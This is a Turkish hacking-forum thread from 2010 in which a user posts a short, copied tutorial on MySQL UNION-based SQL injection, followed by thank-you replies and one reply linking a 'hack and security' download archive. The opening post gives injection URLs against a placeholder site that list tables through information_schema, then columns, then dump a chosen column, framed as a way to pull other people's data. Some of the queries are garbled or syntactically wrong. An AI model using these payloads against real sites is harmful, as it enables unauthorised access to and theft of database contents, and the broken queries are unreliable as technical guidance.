THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

MySQL İnjection ( Resimli )

TRNooNTR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2008
Nereden:
drwxr-xr-x
Mesajlar:
2.521
Konular:
605
Teşekkür (Etti):
220
Teşekkür (Aldı):
1024
Ticaret:
(0) %
21-11-2010 01:36
#1
MySQL İnjection ( Resimli )
S.A Arkadaşlar...

Arkadaşlar SQL bir veritabanı dilidir. ve MySQL de bunun bir parçasıdır.
Genellikle php ve asp dilleriyle yazılmış sitelerde kendini belli eder. Şuanda pek çok Sitede Bulunmaktadır. MySQL hakkında görsel bilgi vereyim...




Diye bir tablomuz var...
Şimdi (Emre) adlı memurun bilgilerini nasıl çekeriz ?

# Memurlar adlı tabloda
#Emre adlı kolonda saklanmaktadır bilgiler...

union * select * emre * from * memur

Bu kod şu demektir...
Memurlar adlı tablodan kolon adı emre olan kişiyi çağır...

Dediğimizde Emre adlı kişinin bilgileri ekrana vurmuş olur...
MySQL versiyon 4’te iş access gibi tahmine dayanır. ama versiyon 5 te bu şekilde değildir...

Tablo adını bkz.
www.site.com/catogary.php?id=1 union select table_name from information_schema.tables
Şeklinde alabiliriz...

Ve Ekrana Tablo adlaı vurur Ardından ;

www.site.com/catogary.php?id=1 union select column_name from columns where table_name="memurlar"

Bu kodlada malum kolonumuz olan Emre kolonuna ulaşırız...

ve Emre adlı kolonu çağırmak için;

www.site.com/catogary.php?id=1 union select Emre from memurlar

dediğimizde Ekranda herşey gözükür...
Fazla derin anlatmadım
Yararlı Olması Dileğiyle...

Alıntıdır.
---------------------
Kod:
Sanal aleme ara verdim.
Uzunca bir süre online olmayacağım.
Allaha emanet olun.

By TRNooNTR
Kod:
I took a break the virtual realm.
 Will not be online for a long time.
 Be entrusted to God.

 By TRNooNTR
mintika2 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2010
Mesajlar:
54
Konular:
9
Teşekkür (Etti):
16
Teşekkür (Aldı):
7
Ticaret:
(0) %
21-11-2010 07:57
#2
sağol generalim!
--------------------- ADAM BİLGİSAYARIN BAŞINDA HASTALANMIŞ NEDEN ÇÜNKÜ WİNDOWS AÇIK KALMIŞ
Demonvhoons - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2010
Nereden:
iSLam-BoL
Mesajlar:
339
Konular:
48
Teşekkür (Etti):
15
Teşekkür (Aldı):
31
Ticaret:
(0) %
21-11-2010 11:10
#3
tşkkrler açılayıcı olmus
--------------------- Laf Çok Ama Söylecek Adam Yok...!



İnsan İhsanın Kölesidir....
Agemon - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2010
Mesajlar:
6.477
Konular:
4301
Teşekkür (Etti):
62
Teşekkür (Aldı):
668
Ticaret:
(0) %
21-11-2010 18:34
#4
geçerli konu olmuş adamım
TRNooNTR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2008
Nereden:
drwxr-xr-x
Mesajlar:
2.521
Konular:
605
Teşekkür (Etti):
220
Teşekkür (Aldı):
1024
Ticaret:
(0) %
22-11-2010 00:00
#5
Eywallah Arkadaşlar
---------------------
Kod:
Sanal aleme ara verdim.
Uzunca bir süre online olmayacağım.
Allaha emanet olun.

By TRNooNTR
Kod:
I took a break the virtual realm.
 Will not be online for a long time.
 Be entrusted to God.

 By TRNooNTR
hackerkont, IxTrap Teşekkür etti.
hackerkont - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2008
Mesajlar:
266
Konular:
5
Teşekkür (Etti):
43
Teşekkür (Aldı):
30
Ticaret:
(0) %
22-11-2010 19:50
#6
teşekkürler anlatım güzel hemde görsel Süper!!!
zinedxxx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Mesajlar:
35
Konular:
3
Teşekkür (Etti):
1
Teşekkür (Aldı):
4
Ticaret:
(0) %
22-11-2010 20:17
#7
Bilmiyenler için iyi olmuş eline sağlık
TRNooNTR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2008
Nereden:
drwxr-xr-x
Mesajlar:
2.521
Konular:
605
Teşekkür (Etti):
220
Teşekkür (Aldı):
1024
Ticaret:
(0) %
24-11-2010 08:16
#8
Saol Arkadaşlar
---------------------
Kod:
Sanal aleme ara verdim.
Uzunca bir süre online olmayacağım.
Allaha emanet olun.

By TRNooNTR
Kod:
I took a break the virtual realm.
 Will not be online for a long time.
 Be entrusted to God.

 By TRNooNTR
tombkiller - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2008
Nereden:
Cehennemin Dibi
Mesajlar:
880
Konular:
34
Teşekkür (Etti):
74
Teşekkür (Aldı):
109
Ticaret:
(0) %
24-11-2010 10:46
#9
arkadaşlar bu konu ile ilgili videolu, uygulamalı ve dokumanlı bir arşiv var. konu ile ilgilenenler indirip inceleyebilir. ben inceledim. çok güzel anlatmış. ama ben yapamadım.

incelemek isteyenler aşağıdaki linke baksınlar. Ayrıca içinde pek çok konu var. Sadece MySQL injection yok.

http://hotfile.com/dl/78823059/c443e67/Hack_Ve_Guvenlik_Seti.rar.html
umutcix - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2010
Nereden:
Nereye xDé
Mesajlar:
595
Konular:
69
Teşekkür (Etti):
44
Teşekkür (Aldı):
58
Ticaret:
(0) %
21-12-2010 22:42
#10
güzel anlatım saol
--------------------- بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِ ارَّحِيم



Esirgeyen ve bağışlayan Allah'ın adı ile







Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler